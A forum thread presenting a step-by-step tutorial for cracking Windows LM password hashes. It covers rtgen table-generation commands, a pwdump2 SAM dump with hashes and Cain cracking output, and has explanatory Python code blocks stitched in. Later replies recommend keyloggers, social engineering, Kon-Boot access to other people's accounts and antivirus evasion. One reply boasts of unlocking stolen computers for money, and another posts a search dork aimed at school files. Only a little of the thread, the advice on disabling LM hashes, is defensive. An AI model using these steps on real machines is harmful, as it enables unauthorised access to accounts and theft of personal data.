[How-to] Cracking Windows Passwords


Biovore
9th August 2005, 06:09 PM
------------------------------
CRACKING WINDOWS PASSWORDS
------------------------------

Well, after much umming and aahing, I bring to you the definitive guide to hacking Windows passwords of up to 14 characters in a few seconds.

------------------------------
Tool kit:
------------------------------

Rainbow Crack
pwdump2
Cain & able

------------------------------
Cliff steps:
------------------------------

1) generate rainbow tables

2) dump sam and system file

3) use cain to crack password via rainbow tables

Yes, it is THAT simple.

------------------------------
MORE DETAIL:
------------------------------

Rainbow tables, what are they? Well, think of them as large files of random passwords already computed.

you can read more here:

http://www.antsight.com/zsl/rainbowcrack/

Anyway, fire up rtgen and get some tables....

rtgen is a program which will generate rainbow chains, which then combine to make a rainbow table.

Here are the bat files for you lazy people:


rem config 1
rem rtgen <hash> <charset> <min_len> <max_len> <table_index> <chain_len> <chain_num> <part_index>
rtgen lm alpha 1 7 0 2100 8000000 all
rtgen lm alpha 1 7 1 2100 8000000 all
rtgen lm alpha 1 7 2 2100 8000000 all
rtgen lm alpha 1 7 3 2100 8000000 all
rtgen lm alpha 1 7 4 2100 8000000 all


and


rem config 2
rtgen lm alpha-numeric 1 7 0 2400 40000000 all
rtgen lm alpha-numeric 1 7 1 2400 40000000 all
rtgen lm alpha-numeric 1 7 2 2400 40000000 all
rtgen lm alpha-numeric 1 7 3 2400 40000000 all
rtgen lm alpha-numeric 1 7 4 2400 40000000 all


Config 1 should take 12-24 hrs to generate depending on your machine, maybe even 36 hrs. It will use 610 MB of disk space.

Config 2 should take around 5 days to generate and use 3 GB of HDD space.

Coming soon will be config 3, which will take 18 GB of space... :O

So, config 1 will be able to crack 99.904% of passwords that ONLY have alpha characters in a few seconds. I will be using these tables for the tut, as I imagine most of you don't want to spend 5 days on rtgen.

Also, you will need to sort the files to make them more efficient.

This is done via rtsort:


rem config 1
rtsort lm_alpha#1-7_0_2100x8000000_all.rt
rtsort lm_alpha#1-7_1_2100x8000000_all.rt
rtsort lm_alpha#1-7_2_2100x8000000_all.rt
rtsort lm_alpha#1-7_3_2100x8000000_all.rt
rtsort lm_alpha#1-7_4_2100x8000000_all.rt



rem config 2
rtsort lm_alpha-numeric#1-7_0_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_1_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_2_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_3_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_4_2400x40000000_all.rt




So you have wasted some space, and you go, hmmm, what's next?

Well we are going to dump the SAM to a file.

The SAM file is a depository for the user names and password hashes for every account on the local machine, or domain if it is a domain controller. That wasn't too hard, was it?

To do this, we are going to use a program called pwdump2

run the exe in cmd and issue this code:

pwdump2 > pass.txt

What that will do is redirect output to a file named pass.txt in the same folder as the program.

Open it up; this is what it will look like:


Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:569fbcadc4ce9874da275e3dd3b3773c:fdcc6716e6ec3388bc0694086538e4f2:::
RORTA:1008:c036412e27c931e297b0668eeca3a3a4:fe31056a1f67c9e149d60851d36d39fe:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:54b4144f22141ce78c44cb2e5b38b852:::
__vmware_user__:1005:aad3b435b51404eeaad3b435b51404ee:839a847853f36b5a0bae94bca6992ea6:::


As you can see, I have removed my account and the admin one, so... note the RORTA one :P

now what?

well we will fire up cain

In Cain you will see a tab that says cracking; go to that one...

Now in the left-most column you can see an NT and NTLM hashes tab; click that one.

now hit the big plus sign

select import

open the pass.txt in your pwdump2 folder

highlight the accounts you want to crack and right click

select Cryptanalysis attack

press add table and then import all your rainbow tables...

then START! and wait 10 seconds....


Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.00 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of c036412e27c931e2 is RORTARU
Plaintext of 97b0668eeca3a3a4 is LES
Cryptanalysis time: 4.44 s

Username Password
------------------------------------------
RORTA RORTARULES



Lets have a little look at the output here:

As you can see, 2 hashes were loaded. That's because LM can only store 7 chars in each hash; the pass was 10 chars, so 7 in 1 hash and 3 in the other...

This time, I went to a website that generated, and I quote, "secure passwords". Well, let's see how secure it is now....


Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.42 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of 4dcb7b0d5742450d is RLUPRI
Cryptanalysis time: 5.02 s

Reading lm_alpha#1-7_1_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.66 s
Verifying the file... (OK)
Searching for 1 hash...
Cryptanalysis time: 3.91 s

Reading lm_alpha#1-7_2_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.19 s
Verifying the file... (OK)
Searching for 1 hash...
Plaintext of e6ea64de82fd05a1 is WIAXOED
Cryptanalysis time: 0.49 s

Username Password
------------------------------------------
secure WIAXOEDRLUPRI



Doesn't seem overly secure to me....

any questions?
:owned2:
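
The post treats rainbow tables as "large files of random passwords already computed"; what rtgen actually stores is chains. The block below is an added example (not the tutorial's or RainbowCrack's code) that builds a scaled-down rainbow table and looks a hash up in it, so the rtgen arguments above have something concrete to map onto: `alpha 1 7` is the keyspace (here 3 lowercase letters), `0`..`4` is the table index (a different reduction per table), `2100` is the chain length and `8000000` the chain count. Only the start and end of each chain are kept (16 bytes per chain in a .rt file, so 8,000,000 chains is the 128,000,000 bytes Cain reports reading), rtsort orders them by endpoint, and the cracker regenerates chains on demand. The hash, reduction and all sizes are assumptions for the toy; the structure is the real algorithm.

```python
"""Toy rainbow table: what rtgen, rtsort and the Cain/rcrack lookup do, scaled
down to a 3-letter lowercase keyspace, a truncated SHA-256 in place of LM and
short chains. Added example, not the tutorial's or RainbowCrack's own code."""
import hashlib
import random
import string

CHARSET = string.ascii_lowercase       # rtgen's "alpha", minus uppercase
PT_LEN = 3                             # fixed length keeps the toy simple
KEYSPACE = len(CHARSET) ** PT_LEN      # 17576 plaintexts


def toy_hash(plaintext: str) -> bytes:
    """Stand-in for one LM half-hash: any one-way function will do here."""
    return hashlib.sha256(plaintext.encode()).digest()[:8]


def reduce_to_plaintext(h: bytes, position: int, table_index: int) -> str:
    """Map a hash back into the keyspace. The result depends on the link
    position (each column uses a different reduction, which is what makes it
    a *rainbow* table and limits chain merges) and on the table index
    (rtgen's table_index argument, so tables 0..4 cover different chains)."""
    n = (int.from_bytes(h, "big") + position + (table_index << 32)) % KEYSPACE
    chars = []
    for _ in range(PT_LEN):
        n, r = divmod(n, len(CHARSET))
        chars.append(CHARSET[r])
    return "".join(chars)


def make_chain(start: str, chain_len: int, table_index: int) -> str:
    """Walk one chain start -> hash -> reduce -> ... and return its endpoint."""
    p = start
    for i in range(chain_len):
        p = reduce_to_plaintext(toy_hash(p), i, table_index)
    return p


def generate_table(chain_num: int, chain_len: int, table_index: int, seed: int = 0) -> dict:
    """rtgen + rtsort: compute chain_num chains but keep only (end -> starts),
    indexed so lookups are cheap. Nothing in between is stored; that is why a
    real .rt file is 16 bytes per chain (8,000,000 chains = 128,000,000 bytes,
    the size Cain reports) rather than 2100 plaintexts per chain."""
    rng = random.Random(seed)
    table = {}
    for _ in range(chain_num):
        start = "".join(rng.choice(CHARSET) for _ in range(PT_LEN))
        table.setdefault(make_chain(start, chain_len, table_index), []).append(start)
    return table


def crack(target: bytes, table: dict, chain_len: int, table_index: int):
    """rcrack: assume the target sits at column pos of some chain, walk to the
    chain end, look the endpoint up, then replay every stored chain with that
    endpoint from its start until the target appears (or it was a false alarm,
    i.e. a merged chain that never contained the target)."""
    for pos in range(chain_len - 1, -1, -1):          # cheapest positions first
        p = reduce_to_plaintext(target, pos, table_index)
        for i in range(pos + 1, chain_len):
            p = reduce_to_plaintext(toy_hash(p), i, table_index)
        for start in table.get(p, []):
            q = start
            for i in range(chain_len):
                if toy_hash(q) == target:
                    return q
                q = reduce_to_plaintext(toy_hash(q), i, table_index)
    return None                                        # not covered by this table


def success_rate(table: dict, chain_len: int, table_index: int,
                 samples: int = 100, seed: int = 1) -> float:
    """Fraction of random plaintexts the table recovers: the toy analogue of
    the 99.904% coverage quoted for config 1 (which uses five tables)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(samples):
        pt = "".join(rng.choice(CHARSET) for _ in range(PT_LEN))
        found = crack(toy_hash(pt), table, chain_len, table_index)
        hits += found is not None and toy_hash(found) == toy_hash(pt)
    return hits / samples


if __name__ == "__main__":
    CHAIN_LEN, CHAIN_NUM = 50, 2000
    tbl = generate_table(CHAIN_NUM, CHAIN_LEN, table_index=0)
    print(f"{len(tbl)} distinct endpoints for {CHAIN_NUM} chains (merges collapsed the rest)")
    print("crack('kgs') ->", crack(toy_hash("kgs"), tbl, CHAIN_LEN, 0))
    print("coverage of one table:", success_rate(tbl, CHAIN_LEN, 0))
```

Two things the toy makes visible that the tutorial's numbers hide: the table never reaches 100% coverage (chains merge, and rtgen's five table indexes exist to push the combined coverage up), and every lookup costs on the order of chain_len squared hash operations, which is the "wait 10 seconds" in the post.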

Stone
10th August 2005, 02:56 PM
Good Job Bio! Is there a way to prevent this happening on a PC though? And, what about the people using fingerprint scanners?

Biovore
10th August 2005, 05:07 PM
To disable this you will need to disable LM hashing on your machines if you are using Win2k, XP or 2k3, but if you are using 95, 98 or ME you cannot stop this attack.

Here is a knowledge base article which explains how to disable them; use the second method.

http://support.microsoft.com/default.aspx?scid=KB;EN-US;q299656&

As for fingerprint scanners, they don't use password hashing; they require other methods to validate the fingerprint.

A major shortcoming of this is that you need to have a shell on the system to pull this off.
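
An added example (not pwdump2's or Cain's code) that ties the pwdump output in the original post to the NoLMHash fix above. Each LM hash is two independent 8-byte DES outputs, one per 7-character half, and the constant aad3b435b51404ee is what an empty half produces; so the pwdump lines already tell you which accounts the rainbow tables can touch at all (both halves empty means LM storage is off, the password is blank, or it is over 14 characters; only the second half empty means a 1-7 character password with a single half to crack). After NoLMHash is set the constant only appears once each password is next changed, which is what this triage lets you verify. The script also parses Cain's "Plaintext of ... is ..." lines and stitches the halves back together, and enumerates the case variants an LM plaintext leaves open, since LM is case-insensitive and the NT hash is not. The sample dump reuses the thread's own lines plus one constructed account; the "short" entry and its NT hash are made up.

```python
"""Triage a pwdump-format dump for LM exposure and reassemble cracked LM halves.
Added example, not pwdump2's or Cain's code. LM uppercases the password, pads it
to 14 bytes, splits it into two 7-byte halves and DES-encrypts the constant
"KGS!@#$%" under each half as key; the two 8-byte results are attacked
independently, which is why Cain prints two "Plaintext of ..." lines per user."""
import itertools
import re
from dataclasses import dataclass

# LM half of an empty 7-byte half (DES of "KGS!@#$%" under an all-zero key).
# Both halves equal to this: LM storage disabled (NoLMHash), empty password,
# or a password longer than 14 characters.
EMPTY_LM_HALF = "aad3b435b51404ee"
# NT hash (MD4 of UTF-16LE) of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed pwdump2-style input (user:rid:lmhash:nthash:::). Guest, RORTA and
# SUPPORT are the thread's own lines; "short" is invented: the first LM half of
# the thread's "secure" account, an empty second half and a made-up NT hash.
SAMPLE_DUMP = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RORTA:1008:c036412e27c931e297b0668eeca3a3a4:fe31056a1f67c9e149d60851d36d39fe:::
short:1009:4dcb7b0d5742450daad3b435b51404ee:0123456789abcdef0123456789abcdef:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:54b4144f22141ce78c44cb2e5b38b852:::
this line is malformed and must be skipped
"""

# Constructed from the "Plaintext of ... is ..." lines Cain printed in the thread.
SAMPLE_CRACK_OUTPUT = """\
Plaintext of c036412e27c931e2 is RORTARU
Plaintext of 97b0668eeca3a3a4 is LES
Plaintext of 4dcb7b0d5742450d is RLUPRI
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str   # 32 lowercase hex chars
    nt: str   # 32 lowercase hex chars

    @property
    def lm_halves(self):
        return self.lm[:16], self.lm[16:]


def parse_pwdump(text: str):
    """Parse user:rid:lm:nt::: lines, skipping blank or malformed ones."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if HEX32.match(lm) and HEX32.match(nt):
            accounts.append(Account(parts[0], int(parts[1]), lm, nt))
    return accounts


def lm_exposure(acct: Account) -> str:
    """'none': nothing for a rainbow table to attack; 'short': 1-7 chars, one
    half to crack; 'full': 8-14 chars, both halves to crack."""
    first, second = acct.lm_halves
    if first == EMPTY_LM_HALF:
        return "none"
    return "short" if second == EMPTY_LM_HALF else "full"


def parse_crack_output(text: str) -> dict:
    """Map each cracked 8-byte LM half (hex) to the plaintext reported for it."""
    return {m.group(1).lower(): m.group(2)
            for m in re.finditer(r"Plaintext of ([0-9a-fA-F]{16}) is (\S+)", text)}


def reassemble(acct: Account, cracked: dict):
    """Join the cracked halves into the uppercase LM plaintext. Returns "" for
    a genuinely blank password, None when there is no LM hash to work with or
    a non-empty half is still uncracked."""
    first, second = acct.lm_halves
    if first == EMPTY_LM_HALF:
        return "" if acct.nt == EMPTY_NT else None
    pieces = []
    for half in (first, second):
        if half == EMPTY_LM_HALF:
            break                       # short password: no second half
        if half not in cracked:
            return None
        pieces.append(cracked[half].upper())
    return "".join(pieces)


def case_variants(lm_plaintext: str):
    """LM is case-insensitive but the NT hash is not: the real password is one
    of 2**k candidates for k letters, each worth testing against the NT hash."""
    options = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in lm_plaintext]
    for combo in itertools.product(*options):
        yield "".join(combo)


def report(dump_text: str, crack_text: str):
    """(user, exposure, recovered LM plaintext) for every parsed account."""
    cracked = parse_crack_output(crack_text)
    return [(a.user, lm_exposure(a), reassemble(a, cracked)) for a in parse_pwdump(dump_text)]


if __name__ == "__main__":
    for user, exposure, plain in report(SAMPLE_DUMP, SAMPLE_CRACK_OUTPUT):
        print(f"{user:18} lm={exposure:5} plaintext={plain!r}")
```

Run against a fresh dump after setting NoLMHash and forcing a password change, every account should come back as "none"; any that still reads "short" or "full" has not had its password changed since the setting was applied and is still crackable by the method above.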

phoenix
12th August 2005, 06:32 PM
Does this apply to Novell logins?

Currently our system lets each user login locally as a Novell profile which is deleted after log off. We also have Deepfreeze installed. Does your system bypass this?

Windows XP has been a bane in my life since we upgraded. 98 was a dream considering the programs I had to run however Autodesk and MYOB make life most difficult to run with the appropriate rights mixed with XP etc.

Biovore
12th August 2005, 06:53 PM
To my knowledge Novell doesn't use LM hashing to store passwords.

So this method doesn't apply to you. But as Windows XP is used as the base, maybe the SAM file is updated with Novell accounts.

I don't have access to a Novell lab till next week some time; I'll try it out and see what I can do.

Any password, given enough time, will be cracked via brute force attacks. Remember, time is infinite....

phoenix
12th August 2005, 07:36 PM
Locally the SAM file is crackable however it is hardly worth the time of the cracker as currently explicit permissions are allowed as Admin due to certain programs needing to run as Admin to function correctly. That is temporary though.

We currently run Novell Zenworks, which has only been implemented recently (due to much whinging on my part) and as far as I can tell it creates a local user login depending on the profile set up for the specific Novell group or user who is logging in.

Unfortunately I'm neither trained nor qualified to give detailed information on the workings of Novell 6.5 due to "budget restrictions". However I'm always keen to know what my adversaries are up to in regards to "hacking" Novell and Windows XP.

Mostly because I hate XP.

Greenflame
13th August 2005, 07:35 PM
I remember when Win95 was first released, people were manually cracking them by some algorithm that was simple math used to alternate binary and ASCII. They upgraded the hash in 95b I think.

Most American school infrastructures use Lotus R5. It uses RSA, so unless you have a cluster or supercomputer it'll be a while. Unless they use short keys. IBM Lotus Server and Client embed into Windows and actually make them more secure for networking features.


## You won't find this on johnnyIhackstuff.
inurl:k12 ext:NSF OR NDL OR NPR OR NS3 OR NS4 OR NC5 OR NSF OR NSG OR NSH OR NTF -html -htm -xls -mht

Mr.A
11th May 2009, 10:58 AM
Is there any easy way to gain administrative control over a comp that runs off of Vista?

Th0r
11th May 2009, 06:00 PM
Glad to see you're back, Mr.A.

A lot of things have changed since you were here last.

Find the administrator password. Either by using a keylogger or by using common sense/Social Engineering.

lcnostra
11th May 2009, 08:06 PM
Is there any easy way to gain administrative control over a comp that runs off of Vista?

Ophcrack works for vista by exploiting vulnerabilities in the rainbow tables, just like the OP's method.

.VX
12th May 2009, 10:43 AM
Is there any easy way to gain administrative control over a comp that runs off of Vista?

I doubt it.

Stone
12th May 2009, 10:47 PM
Do you have physical access to the machine in question?

Mr.A
13th May 2009, 07:43 AM
Yes'm

REL0AD
13th May 2009, 04:34 PM
A lot of things have changed since you were here last.

Like? :baby:

Stone
13th May 2009, 09:57 PM
Try this (http://home.eunet.no/pnordahl/ntpasswd/).

Mr.A
14th May 2009, 10:08 AM
Try this (http://home.eunet.no/pnordahl/ntpasswd/).

Thanks a lot, I was doing this for somebody else so I sent them the link. I'll let you know if it works out for them...Thanks again :):D

redjoker
14th May 2009, 10:54 AM
Try winlockpwn if the computer has a firewire port. http://storm.net.nz/projects/16

punkrocker07
20th August 2010, 05:07 AM
Hiren's Boot CD, http://www.hirensbootcd.net/

It's a live CD you boot to before Windows starts (in BIOS, boot from the CD/DVD drive).

There is a Windows password tool; boot to that, then follow the instructions and it will erase the password or change it to what you want without knowing the old password.

I used this in a computer repair shop I worked at when customers would forget to give us their password.

I'm sure if you Google it there are tutorials. If not, message me and I can tell you how to use it in more detail.

thizzladen
20th August 2010, 08:07 AM
That's what I use as well. A lot of people I know come at me with "Hey, I forgot my password on this computer!"... When I hypothetically know it's stolen.

Quick $50.

memphisbrit
20th August 2010, 02:34 PM
Hiren's is a great tool. Might I also suggest the Falcon Boot CD:

http://thepiratebay.org/torrent/5283510

There is a tool on here called Kon-Boot which allows you to access people's Windows accounts by bypassing their password - you can gain access to their accounts WITHOUT resetting the password.

A far more subtle approach depending on your reasons for accessing their account!

-=HeX=-
20th August 2010, 07:27 PM
A boot CD/DVD or USB of Ophcrack works wonders for any windows XP/Vista/7 machine.
It does something with rainbow tables...

xx_hellraiser_xx
7th September 2010, 05:15 AM
I have cracked a couple of PCs with nothing but Cain & Abel. The problem for me is that you need administrator access. Anti-virus also catches Cain & Abel. Is there any way you can bypass the anti-virus?

Th0r
7th September 2010, 05:45 PM
Disable the anti-virus or run Cain & Abel in a VM?

Thinking about it, you can run C&A on a USB bootable live version of XP.

lcnostra
7th September 2010, 11:34 PM
A boot CD/DVD or USB of Ophcrack works wonders for any windows XP/Vista/7 machine.
It does something with rainbow tables...

I don't understand why people go to the trouble of everything else when there's this option. I've yet to see Ophcrack take more than a few minutes on machines I've tested. Unless you're interested in learning about the logistics of how Windows stores passwords, there is no reason to do it any other way. If you just want the password in the easiest way possible, this is it.